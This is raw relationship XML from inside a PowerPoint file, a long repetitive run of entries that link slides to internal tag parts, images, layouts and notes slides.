Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag401.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag400.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag399.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag398.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag397.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag382.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag396.xml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tags" Target="../tags/tag38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10.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag409.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag408.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag407.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag406.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide12.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout53.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag423.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag422.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag421.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag405.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag420.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag419.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag418.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag417.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag416.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag415.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag414.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag413.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag412.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag411.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag40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30.xml"/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13.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag426.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide13.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout54.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag445.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag444.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag443.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag442.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag441.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag425.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag440.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag439.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag438.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag437.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag436.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag435.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag434.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag433.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag432.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag431.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag42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450.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag449.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide14.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout55.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag473.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag472.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag471.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag448.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag470.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag469.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag468.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag467.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image26.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag466.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag465.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag464.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag463.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag462.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag461.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag460.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag459.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag458.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag457.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag456.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag447.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag455.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag454.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag453.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag452.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag451.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag44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56.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png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tags" Target="../tags/tag481.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag480.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag479.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide16.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout57.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag492.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag491.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag490.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag489.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag488.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag487.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag478.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image32.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag486.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag485.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag484.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag483.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag482.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag47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59.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag495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35.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag334.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag333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337.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag336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0.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag497.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag49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04.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag503.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag502.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag501.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide19.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout61.xml"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag544.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.jpeg"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag543.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag542.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag541.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag540.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag539.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag538.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag537.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag536.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag535.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag534.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag500.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag533.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag532.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag531.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag530.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag529.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag528.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag527.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag526.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag525.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag524.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.jpeg"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag523.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag522.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag521.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag520.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag519.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag518.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag517.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag516.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag515.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag514.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag499.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.jpeg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag513.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag512.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag511.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag510.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag509.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag508.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag507.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag506.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag505.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag498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58.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag547.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag546.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag54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62.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag552.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag551.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag550.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag549.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag54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tags" Target="../tags/tag557.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag556.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag555.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag554.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag55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566.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag565.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag564.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag563.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag562.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag561.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag560.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide23.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout64.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag582.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag581.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag580.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag579.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag578.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag577.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag559.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag576.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag575.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag574.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag573.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag572.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag571.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag570.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag569.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag568.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag567.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag55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65.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag584.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag583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66.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag587.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag586.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag585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67.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag591.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag590.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag589.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag588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68.xml"/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339.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag338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69.xml"/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" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag595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70.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag601.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag600.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag599.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag598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609.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag608.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag607.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag606.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag605.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag604.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag603.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag602.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide30.xml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612.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag611.xml"/><Relationship Id="rId10" 